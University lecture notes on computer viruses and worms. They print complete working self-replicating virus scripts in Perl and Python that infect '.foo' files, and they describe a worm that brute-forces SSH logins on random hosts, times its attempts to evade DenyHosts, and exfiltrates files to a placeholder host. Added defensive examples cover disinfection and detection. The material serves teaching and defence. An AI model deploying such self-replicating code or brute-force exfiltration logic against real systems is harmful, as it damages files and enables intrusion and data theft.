Lecture notes on Computer and Network security

Lecture 22: Malware: Viruses and Worms

Lecture Notes on "Computer and Network Security" by Avi Kak (kak@purdue.edu)
April 11, 2017, 10:55pm
(c) 2017 Avinash Kak, Purdue University

Goals:

• Attributes of a virus
• Educational examples of a virus in Perl and Python
• Attributes of a worm
• Educational examples of a worm in Perl and Python
• Some well-known worms of the past
• The Conficker and Stuxnet worms
• How afraid should we be of viruses and worms?

CONTENTS

22.1 Viruses
22.2 The Anatomy of a Virus with Working Examples in Perl and Python
22.3 Worms
22.4 Working Examples of a Worm in Perl and Python
22.5 Morris and Slammer Worms
22.6 The Conficker Worm
22.6.1 The Anatomy of Conficker.A and Conficker.B
22.6.2 The Anatomy of Conficker.C
22.7 The Stuxnet Worm
22.8 How Afraid Should We Be of Viruses and Worms
22.9 Homework Problems

22.1: VIRUSES

• A computer virus is a malicious piece of executable code that propagates, typically by attaching itself to a host document that will generally be an executable file. In the context of viruses, the word "host" means a document or a file. As you'll recall from our earlier discussions, in the context of computer networking protocols a "host" is typically a digital device capable of communicating with other devices; more specifically, a host is whatever is identified by a network address, such as an IP address.

• Typical hosts for computer viruses are:

  – Executable files (such as the '.exe' files on Windows machines) that may be sent around as email attachments
  – Boot sectors of disk partitions
  – Script files for system administration (such as batch files on Windows machines, shell script files on Unix, etc.)
  – Documents that are allowed to contain macros (such as Microsoft Word documents, Excel spreadsheets, Access database files, etc.)

• Any operating system that allows third-party programs to run can support viruses.

• Because of the way permissions work in Unix/Linux systems, it is more difficult for a virus to wreak havoc on such machines. Let's say that a virus embedded itself into one of your script files. The virus code will execute only with the permissions that are assigned to you. For example, if you do not have permission to read or modify a certain system file, the virus code will, in general, be constrained by the same restriction. Windows machines also have a multi-level organization of permissions: you can be an administrator with all possible privileges, or just a user with more limited privileges. But it is fairly common for the owners of Windows machines to leave them running in "administrator" mode. That is, most owners of Windows machines have only one account on their machines, and that is the account with administrator privileges. For various reasons that we do not want to go into here, this does not happen on Unix/Linux machines.

• At the least, a virus will duplicate itself when it attaches itself to another host document, that is, to another executable file. But the important thing to note is that this copy does not have to be an exact replica of the original. In order to make detection by pattern matching more difficult, a virus may alter itself when it propagates from host to host. In most cases the changes made to the virus code are simple, such as reordering instructions whose relative order does not matter. Viruses that are capable of changing themselves are called mutating viruses.
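The strongest form of the self-alteration just described, which the next bullets single out, is a body that is encrypted with a key that changes on every infection and sits behind a decryption routine that stays the same. The idea can be shown without any real virus. The Python script below is an added example and is not from these notes: the toy "body", the stub text and the one-byte XOR cipher are all constructed here, nothing in it is executed as code, and it only measures what a naive substring scanner would and would not find across the mutated copies.

```python
# Added example (not from Kak's notes): per-copy encryption behind a constant
# decryption stub, reduced to byte strings. Each "copy" of the toy body is
# XOR-ed with a fresh one-byte key and prefixed with the fixed stub, so a
# scanner keyed on the body text misses every copy while one keyed on the
# stub catches them all. Nothing here is executed as code.
import random

BODY = b"print 'foovirus payload'\n"       # constructed toy body, never run
STUB = b"DECRYPT_STUB:"                     # the part that stays constant
STUB_LEN = len(STUB)

def encrypt_copy(body, rng):
    """Return one mutated copy: STUB + key byte + (body XOR key), key != 0."""
    key = rng.randrange(1, 256)
    return STUB + bytes([key]) + bytes(b ^ key for b in body)

def decrypt_copy(copy):
    """What the decryption stub would do at run time: recover the body."""
    key = copy[STUB_LEN]
    return bytes(b ^ key for b in copy[STUB_LEN + 1:])

def signature_hits(copies, pattern):
    """How many copies a naive substring scanner flags for `pattern`."""
    return sum(1 for c in copies if pattern in c)

def demo(n_copies=20, seed=1):
    """Mutate the body n_copies times and score two candidate signatures."""
    rng = random.Random(seed)
    copies = [encrypt_copy(BODY, rng) for _ in range(n_copies)]
    assert all(decrypt_copy(c) == BODY for c in copies)   # every copy still "works"
    return {
        "distinct_copies": len(set(copies)),               # mutation happened
        "body_sig_hits": signature_hits(copies, b"foovirus"),
        "stub_sig_hits": signature_hits(copies, STUB),
    }

if __name__ == "__main__":
    print(demo())
```

The lesson for detection is in the two hit counts: a signature taken from the body finds none of the copies, while one taken from the constant decryptor finds all of them, which is why scanners target the decryption routine (or emulate it) rather than the encrypted payload.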
• Computer viruses need to know whether a potential host is already infected, since otherwise the size of an infected file could grow without bound through repeated infection. Viruses typically place a signature (such as a string that is an impossible date) at a specific location in the file for this purpose.

• Most commonly, the execution of a particular instance of a virus (in a specific host file) will come to an end when the host file has finished executing. However, it is possible for a more vicious virus to create a continuously running program in the background.

• To escape detection, the more sophisticated viruses encrypt themselves with keys that change with each infection. What stays constant in such viruses is the decryption routine.

• The payload part of a virus is that portion of the code that is not related to propagation or concealment.

22.2: THE ANATOMY OF A VIRUS WITH WORKING EXAMPLES IN PERL AND PYTHON

• As should be clear by now, a virus is basically a self-replicating piece of code that needs a host document to glom on to.

• As demonstrated by the simple Perl and Python scripts I will show in this section, writing such programs is easy. The only competence you need is file I/O at a fairly basic level.

• The Perl and Python virus implementations shown in this section use as host documents those files whose names end in the '.foo' suffix. The virus inserts itself into all such files.

• If you send an infected file to someone else and they happen to execute the file, it will infect their '.foo' files also.

• Note that the virus does not re-infect an already infected file. This behavior is exhibited by practically all viruses. It does this by skipping '.foo' files that contain the 'foovirus' signature string.

• It should not be too hard to see how the harmless virus shown here could be turned into a dangerous piece of code.
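Because the infection leaves a fixed marker and a fixed layout (the virus body at the head of the file and every original line commented out with '#', as the listings that follow show), a defender can detect and undo it as mechanically as the virus applied it. The Python script below is an added example, not part of these notes or of FooVirus: the 37-line stand-in virus body, the sample '.foo' contents and the marker-based cleanup are all constructed here, and the infection step is simulated in memory rather than by running either FooVirus script.

```python
# Added example (not part of the notes): detect and undo a FooVirus-style
# infection. Layout assumed, as in the FooVirus listings: the 37-line virus
# first, then each original line with one '#' prepended, and the string
# 'foovirus' somewhere in the virus body as the no-reinfection marker.
import os
import tempfile

MARKER = "foovirus"
VIRUS_LINES = 37          # FooVirus.pl and FooVirus.py are exactly 37 lines long

def is_infected(lines):
    """The same test the virus itself uses to avoid infecting a file twice."""
    return any(MARKER in line for line in lines)

def disinfect(lines):
    """Drop the virus body and strip the single '#' the virus added per line."""
    if not is_infected(lines):
        return list(lines)
    original = lines[VIRUS_LINES:]
    # Caveat: a line that already began with '#' before infection cannot be
    # told apart from one the virus commented out. Stripping exactly one '#',
    # which is all the virus adds, brings both kinds back unchanged.
    return [line[1:] if line.startswith("#") else line for line in original]

def simulate_infection(lines, virus):
    """The infection step of FooVirus, applied in memory (nothing executed)."""
    if is_infected(lines):
        return list(lines)
    return list(virus) + ["#" + line for line in lines]

def sweep_directory(dirpath):
    """Scan every *.foo in dirpath, clean the infected ones, return their names."""
    cleaned = []
    for name in sorted(os.listdir(dirpath)):
        if not name.endswith(".foo"):
            continue
        path = os.path.join(dirpath, name)
        with open(path) as fh:
            lines = fh.readlines()
        if is_infected(lines):
            with open(path, "w") as fh:
                fh.writelines(disinfect(lines))
            cleaned.append(name)
    return cleaned

def demo():
    """Infect, re-infect, sweep, and report what happened (constructed data)."""
    # A constructed stand-in for the virus: 37 lines, the last one carrying the marker.
    virus = ["# line %d of a stand-in for FooVirus\n" % i for i in range(36)]
    virus.append("# marker line: %s\n" % MARKER)
    original = ["echo hello\n", "# already a comment\n", "exit 0\n"]
    once = simulate_infection(original, virus)
    twice = simulate_infection(once, virus)        # marker stops re-infection
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "a.foo"), "w") as fh:
            fh.writelines(once)                    # an infected file
        with open(os.path.join(d, "clean.foo"), "w") as fh:
            fh.writelines(original)                # an untouched one
        cleaned = sweep_directory(d)
        with open(os.path.join(d, "a.foo")) as fh:
            restored = fh.readlines()
    return {"grew_on_reinfection": len(twice) != len(once),
            "cleaned": cleaned,
            "restored_ok": restored == original}

if __name__ == "__main__":
    print(demo())
```

The caveat in disinfect() is the part that matters for real cleanups: stripping exactly one '#' restores lines that were comments to begin with only because this virus adds exactly one. For a less regular infector you need a pristine copy, or a stored hash, to compare against rather than an inverse transformation.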
• As for the name of the virus, since it affects only the files whose names end in the suffix '.foo', it seems appropriate to name it "FooVirus" and to call the Perl script file "FooVirus.pl" and the Python script file "FooVirus.py".

• In the rest of this section, I'll first present the Perl script FooVirus.pl and then the Python script FooVirus.py.

#!/usr/bin/perl
### FooVirus.pl
### Author: Avi kak (kak@purdue.edu)
### Date: April 19, 2006
### (This file is exactly 37 lines long; the virus copies its first 37 lines.)

print "\nHELLO FROM FooVirus\n\n";
print "This is a demonstration of how easy it is to write\n";
print "a self-replicating program. This virus will infect\n";
print "all files with names ending in .foo in the directory in\n";
print "which you execute an infected file. If you send an\n";
print "infected file to someone else and they execute it, their,\n";
print ".foo files will be damaged also.\n\n";
print "Note that this is a safe virus (for educational purposes\n";
print "only) since it does not carry a harmful payload. All it\n";
print "does is to print out this message and comment out the\n";
print "code in .foo files.\n\n";

open IN, "< $0";                       # $0 is the name of the file being executed
my $virus;
for (my $i=0;$i<37;$i++) {
    $virus .= <IN>;                    # collect the first 37 lines: the virus itself
}
close IN;
foreach my $file ( glob "*.foo" ) {
    open IN, "< $file";
    my @all_of_it = <IN>;
    close IN;
    # skip files that already carry the 'foovirus' signature (no re-infection)
    next if (join ' ', @all_of_it) =~ /foovirus/m;
    chmod 0777, $file;                 # make the target executable
    open OUT, "> $file";
    print OUT "$virus";                # the virus goes first
    map { s/^/#/ } @all_of_it;         # comment out every original line
    print OUT @all_of_it;
    close OUT;
}

• Regarding the logic of the code in the virus, the following section of the code

    open IN, "< $0";
    my $virus;
    for (my $i=0;$i<37;$i++) {
        $virus .= <IN>;
    }

reads the first 37 lines of the file that is being executed. This could be the original FooVirus.pl file or one of the files infected by it. Note that FooVirus.pl contains exactly 37 lines of text and code. And when the virus infects another '.foo' file, it places itself at the head of the infected file and then comments out the rest of the target file.
So the first 37 lines of any infected file will be exactly like what you see in FooVirus.pl. If you are not familiar with Perl, $0 is one of Perl's predefined variables. It contains the name of the file being executed. The syntax 'open IN, "< $0"' means that you want to open the file whose name is stored in the variable $0 for reading. The extra symbol '<' just makes explicit that the file is being opened for reading. This symbol is not essential since, by default, a file is opened in read mode anyway.

• The information read by the for loop in the previous bullet is saved in the variable $virus.

• Let's now look at the foreach loop in the virus. It opens for reading each file whose name carries the suffix '.foo'. The 'open IN, "< $file"' statement opens the '.foo' file in read mode only. The statement 'my @all_of_it = <IN>' reads all of the file into the array variable @all_of_it, one line per element.

• We next check whether there is a string match between the file contents stored in @all_of_it and the string 'foovirus'. If there is, we do not do anything further with this file, since we do not want to reinfect a file that was infected previously by our virus.

• Assuming that we are working with a '.foo' file that was not previously infected, we now do 'chmod 0777, $file' to make the '.foo' file executable, since it is the execution of the file that will spread the infection.

• The next statement, 'open OUT, "> $file"', opens the same '.foo' file in write-only mode, truncating it. The first thing we write out to this file is the virus itself, using 'print OUT "$virus"'.

• Next, we want to put back in the file what it contained originally, but after placing the Perl comment character '#' at the beginning of each line. This is to prevent the file from causing problems when it is executed, in case the file has other executable code in it.
Inserting the '#' character at the beginning of each line is accomplished by

    map { s/^/#/ } @all_of_it;

and the write-out of this modified content back to the '.foo' file is accomplished by 'print OUT @all_of_it'. Again, if you are not so familiar with Perl, $_ is Perl's default variable that, in the current context, is bound in turn to each line of the input file as map scans the contents of the array @all_of_it and applies the substitution rule given in its first argument to it.

• Shown next is the Python version of the virus code:

#!/usr/bin/env python
### FooVirus.py
### Author: Avi kak (kak@purdue.edu)
### Date: April 5, 2016
### (This file is exactly 37 lines long; the virus copies its first 37 lines.)

import sys
import os
import glob

print("\nHELLO FROM FooVirus\n")
print("This is a demonstration of how easy it is to write")
print("a self-replicating program. This virus will infect")
print("all files with names ending in .foo in the directory in")
print("which you execute an infected file. If you send an")
print("infected file to someone else and they execute it, their,")
print(".foo files will be damaged also.\n")
print("Note that this is a safe virus (for educational purposes")
print("only) since it does not carry a harmful payload. All it")
print("does is to print out this message and comment out the")
print("code in .foo files.\n")

IN = open(sys.argv[0], 'r')                 # the file being executed
virus = [line for (i, line) in enumerate(IN) if i < 37]
IN.close()
for item in glob.glob("*.foo"):
    IN = open(item, 'r')
    all_of_it = IN.readlines()
    IN.close()
    # skip already-infected files; use 'in', not str.find(), whose -1 is truthy
    if any('foovirus' in line for line in all_of_it): continue
    os.chmod(item, 0o777)                   # octal 0777, Python 3 spelling
    OUT = open(item, 'w')
    OUT.writelines(virus)                   # the virus goes first
    all_of_it = ['#' + line for line in all_of_it]   # comment out the original
    OUT.writelines(all_of_it)
    OUT.close()

• The logic of the Python script shown above parallels exactly what you saw in the Perl version of the virus code.

• To play with this virus, create a separate directory with any name of your choosing. Now copy either FooVirus.pl or FooVirus.py into that directory and make sure you make the file executable.
At the same time, create a couple of additional files with names like a.foo, b.foo, etc., and put any random keystrokes in those files. Also create another directory elsewhere on your computer and similarly create files with names like c.foo and d.foo in that directory. Now you are all set to demonstrate the beastly ways of the innocent-looking FooVirus. Execute the Perl or the Python version of the virus file in the first directory and examine the contents of a.foo and b.foo. You should find them infected by the virus. Then move the infected a.foo, or any of the other '.foo' files, from the first directory to the second directory. Execute the file you just moved to the second directory and examine the contents of c.foo or d.foo. If you are not properly horrified by the damage done to those files, then something is seriously wrong with you. In that case, stop worrying about your computer and seek immediate help for yourself.

22.3: WORMS

• The main difference between a virus and a worm is that a worm does not need a host document. In other words, a worm does not need to attach itself to another program. In that sense, a worm is self-contained.

• On its own, a worm is able to send copies of itself to other machines over a network.

• Therefore, whereas a worm can harm a network and consume network bandwidth, the damage caused by a virus is mostly local to a machine.

• But note that a lot of people use the terms 'virus' and 'worm' synonymously. That is particularly the case with the vendors of anti-virus software. A commercial anti-virus program is supposed to catch both viruses and worms.

• Since, by definition, a worm is supposed to hop from machine to machine on its own, it needs to come equipped with considerable networking support.

• With regard to autonomous network hopping, the important question to raise is: What does it mean for a program to hop from machine to machine?
• A program may hop from one machine to another by a variety of means that include:

  – Using the remote shell facilities, as provided by, say, ssh, rsh, rexec, etc., in Unix, to execute a command on the remote machine. If the target machine can be compromised in this manner, the intruder could install a small bootstrap program on the target machine that could bring in the rest of the malicious software.

  – Cracking the passwords and logging in as a regular user on a remote machine. Password crackers take advantage of people's tendency to keep their passwords as simple as possible (under the prevailing policies concerning the length and complexity of the words). See the Dictionary Attack in Lecture 24.

  – Using buffer overflow vulnerabilities in networking software. See Lecture 21 on Buffer Overflow Attacks. In networking with sockets, a client socket initiates a communication link with a server by sending a request to a server socket that is constantly listening for such requests. If the server socket code is vulnerable to buffer overflow or other stack corruption, an attacker could turn that into the execution of certain system functions on the server machine that would allow the attacker's code to be downloaded onto the server machine.

• In all cases, the extent of harm that a worm can carry out depends on the privileges accorded to the guise under which the worm programs are executing. So if a worm manages to guess someone's password on a remote machine (and that someone does not have superuser privileges), the extent of harm done might be minimal.

• Nevertheless, even when no local "harm" is done, a propagating worm can bog down a network and, if the propagation is fast enough, can cause a shutdown of the machines on the network. This can happen particularly when the worm is not smart enough to keep a machine from getting reinfected repeatedly and simultaneously. Machines can only support a certain maximum number of processes running simultaneously.

• Thus, even "harmless" worms can cause a lot of harm by bringing a network to its knees.

22.4: WORKING EXAMPLES OF A WORM IN PERL AND PYTHON

• The goal of this section is to present a safe working example of a worm, AbraWorm, that attempts to break into hosts that are randomly selected in the internet. The worm attempts SSH logins using randomly constructed but plausible-looking usernames and passwords.

• Since the DenyHosts tool (described in Lecture 24) can easily quarantine IP addresses that make repeated attempts at SSH login with different usernames and passwords, the worm presented in this section reverses the order in which the target IP addresses, the usernames, and the passwords are attempted. Instead of attempting to break into the same target IP address by quickly sequencing through a given list of usernames and passwords, the worm first constructs a list of usernames and passwords and then, for each combination of a username and a password, attempts to break into the hosts in a list of IP addresses. With this approach, it is rather easy to set up a scan sequence so that the same IP address is visited at intervals that are sufficiently long so as not to trigger the quarantine action by DenyHosts.

• The worm works in an infinite loop, forever trying new IP addresses, new usernames, and new passwords.

• The point of running the worm in an infinite loop is to illustrate the sort of network scanning logic that is often used by the bad guys. Let's say that a bunch of bad guys want to install their spam-spewing software on as many hosts around the world as possible. Chances are that these guys are not too concerned about where exactly these hosts are, as long as they do the job.
The bad guys would create a worm like the one shown in this section, a worm that randomly scans the different IP address blocks until it can find vulnerable hosts.

• After the worm has successfully gained SSH access to a machine, it looks for files that contain the string "abracadabra". The worm first exfiltrates those files to the host where it resides in the internet and, subsequently, uploads the files to a specially designated host in the internet whose address is shown as yyy.yyy.yyy.yyy in the code. A reader might ask: Wouldn't using an actual IP address for yyy.yyy.yyy.yyy give a clue to the identity of the human handlers of the worm? Not really. In general, the IP address that the worm uses for yyy.yyy.yyy.yyy can be that of any host in the internet that the worm successfully infiltrated previously, provided it is able to convey the login information for that host to its human handlers. The worm could use a secret IRC channel to convey to its human handlers the username and the password that it used to break into the hosts selected for uploading the files exfiltrated from the victim machines. (See Lecture 29 for how IRC is put to use for such deeds.) You would obviously need more code in the worm for this feature to work.

• Since the worm installs itself in each infected host, the bad guys will have an ever-increasing army of infected hosts at their disposal, because each infected host will also scan the internet for additional vulnerable hosts.

• In the rest of this section, I'll first explain the logic in the Perl implementation of the worm. Subsequently, I'll present the Python implementation of the same worm.

• For the Perl version of the worm, as shown in the file AbraWorm.pl that follows, you'd need to install the Perl module Net::OpenSSH on your computer. On an Ubuntu machine, you can do this simply by installing the package libnet-openssh-perl through your Synaptic Package Manager.
• To understand the Perl code file shown next, it's best to start by focusing on the role played by each of the following global variables that are declared at the beginning of the script:

    digrams
    trigrams
    opt
    debug
    NHOSTS
    NUSERNAMES
    NPASSWDS

• The array variables @digrams and @trigrams store, respectively, a collection of two-letter and three-letter "syllables" that can be joined together in random ways for constructing plausible-looking usernames and passwords. Since a common requirement these days is for passwords to contain a combination of letters and digits, when we randomly join together the syllables for constructing passwords, we throw in randomly selected digits between the syllables. This username and password synthesis is carried out by the functions

    get_new_usernames()
    get_new_passwds()

that are defined toward the end of the worm code.

• The global variable opt is for defining the negotiation parameters needed for setting up the SSH connection with a remote host. We obviously would not want the downloaded public key for the remote host to be stored locally (in order not to arouse the suspicions of the human owner of the infected host). We therefore set the UserKnownHostsFile parameter to /dev/null, as you can see in the definition of opt. The same applies to the other parameters in the definition of this variable.

• If you are interested in playing with the worm code, the global variable $debug is important for you. You should execute the worm code in debug mode by changing the value of $debug from 0 to 1. But note that, in debug mode, you need to supply the worm with at least two IP addresses where you have SSH access. You need at least one IP address for a host that contains one or more text files with the string "abracadabra" in them. The IP addresses of such hosts go where you see xxx.xxx.xxx.xxx in the code below.
In addition, you need to supply another IP address for a host that will serve as the exfiltration destination for the "stolen" files. This IP address goes where you see yyy.yyy.yyy.yyy in the code. For both xxx.xxx.xxx.xxx and yyy.yyy.yyy.yyy, you would also need to supply the login credentials that work at those addresses.

• That takes us to the final three global variables:

    NHOSTS
    NUSERNAMES
    NPASSWDS

The value given to $NHOSTS determines how many new IP addresses will be produced randomly by the function get_fresh_ipaddresses() in each call to the function. The value given to $NUSERNAMES determines how many new usernames will be synthesized by the function get_new_usernames() in each call. And, along the same lines, the value of $NPASSWDS determines how many passwords will be generated by the function get_new_passwds() in each call to the function. As you see near the beginning of the code, I have set the values for all three variables to 3 for demonstration purposes.

• As for the name of the worm, since it only steals the text files that contain the string "abracadabra", it seems appropriate to call the worm "AbraWorm" and the script file "AbraWorm.pl".

• You can download the code shown below from the website for the lecture notes.

#!/usr/bin/perl -w

### AbraWorm.pl
### Author: Avi kak (kak@purdue.edu)
### Date: March 30, 2014
###
### This is a harmless worm meant for educational purposes only. It can only
### attack machines that run SSH servers, and those too only under very special
### conditions that are described below. Its primary features are:
###
###   It tries to break in with SSH login into a randomly selected set of hosts
###   with a randomly selected set of usernames and with a randomly chosen set
###   of passwords.
###
###   If it can break into a host, it looks for the files that contain the
###   string 'abracadabra'. It downloads such files into the host where the
###   worm resides.
###
###   It uploads the files thus exfiltrated from an infected machine to a
###   designated host in the internet. You'd need to supply the IP address and
###   login credentials at the location marked yyy.yyy.yyy.yyy in the code for
###   this feature to work. The exfiltrated files would be uploaded to the host
###   at yyy.yyy.yyy.yyy. If you don't supply this information, the worm will
###   still work, but now the files exfiltrated from the infected machines will
###   stay at the host where the worm resides. For an actual worm, the host
###   selected for yyy.yyy.yyy.yyy would be a previously infected host.
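The remainder of AbraWorm.pl is not reproduced on this page. The parts of its scanning logic that the bullets above describe can nevertheless be exercised without a network, which the following Python script does as an added example; it is not the AbraWorm code (which is Perl) and not from these notes. The syllable lists, the NHOSTS/NUSERNAMES/NPASSWDS values, the sample hosts and the decision to keep only globally routable random addresses are assumptions made here, and no SSH connection is attempted. The script also compares AbraWorm's attempt ordering with the naive per-host ordering, to show what DenyHosts-style per-source failure counting would see in each case.

```python
# Added example (not the AbraWorm code, not from Kak's notes): the offline
# pieces of AbraWorm's scanning logic. Digrams and trigrams are glued into
# plausible usernames and passwords, random public IPv4 addresses stand in
# for get_fresh_ipaddresses(), and the (user, password)-outer / host-inner
# attempt order is compared with the naive host-outer order. No SSH is done.
import ipaddress
import random

# Constructed syllable lists (the real worm carries its own).
DIGRAMS = ["ab", "ad", "al", "an", "ar", "be", "ca", "co", "da", "de",
           "el", "en", "er", "es", "in", "is", "la", "le", "ma", "me",
           "na", "ne", "on", "or", "ra", "re", "ro", "sa", "se", "ta"]
TRIGRAMS = ["ber", "cal", "dan", "dor", "fer", "gan", "har", "jon", "kar",
            "lan", "mar", "nor", "ran", "sam", "tar", "van", "wil"]
NHOSTS, NUSERNAMES, NPASSWDS = 3, 3, 3        # the demo values the notes use

def get_new_usernames(n, rng):
    """Two or three random syllables glued together: letters only."""
    pool = DIGRAMS + TRIGRAMS
    return ["".join(rng.choice(pool) for _ in range(rng.randint(2, 3)))
            for _ in range(n)]

def get_new_passwds(n, rng):
    """Syllables with a random digit thrown in between each adjacent pair."""
    pool = DIGRAMS + TRIGRAMS
    out = []
    for _ in range(n):
        syllables = [rng.choice(pool) for _ in range(rng.randint(2, 3))]
        pw = syllables[0]
        for s in syllables[1:]:
            pw += str(rng.randrange(10)) + s
        out.append(pw)
    return out

def get_fresh_ipaddresses(n, rng):
    """Random IPv4 addresses; assumption made here: keep only globally
    routable ones so reserved/private ranges are never on the list."""
    out = []
    while len(out) < n:
        addr = ipaddress.IPv4Address(rng.getrandbits(32))
        if addr.is_global:
            out.append(str(addr))
    return out

def naive_schedule(hosts, usernames, passwds):
    """Per host, try every (user, pw) pair before moving on: a burst of
    failures from one source against one target, which DenyHosts counts."""
    return [(h, u, p) for h in hosts for u in usernames for p in passwds]

def abraworm_schedule(hosts, usernames, passwds):
    """AbraWorm's order: fix a (user, pw) pair, try it on every host, move on."""
    return [(h, u, p) for u in usernames for p in passwds for h in hosts]

def longest_burst(schedule):
    """Longest run of consecutive attempts against the same host."""
    best = run = 0
    prev = None
    for host, _, _ in schedule:
        run = run + 1 if host == prev else 1
        best = max(best, run)
        prev = host
    return best

def demo(seed=7):
    """One seeded draw of hosts and credentials plus the two burst lengths."""
    rng = random.Random(seed)
    hosts = get_fresh_ipaddresses(NHOSTS, rng)
    users = get_new_usernames(NUSERNAMES, rng)
    pws = get_new_passwds(NPASSWDS, rng)
    return {"hosts": hosts, "users": users, "passwds": pws,
            "naive_burst": longest_burst(naive_schedule(hosts, users, pws)),
            "abraworm_burst": longest_burst(abraworm_schedule(hosts, users, pws))}

if __name__ == "__main__":
    print(demo())
```

The two burst lengths are the point. With the naive order a single target sees NUSERNAMES*NPASSWDS consecutive failures from one source, exactly the pattern a per-IP failure threshold fires on; with AbraWorm's order each target sees one failure, and the next one only after NHOSTS other hosts have been tried. A defender who correlates failed logins across many hosts, or over windows long enough to cover that gap, rather than per host and per short window, is what closes it.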
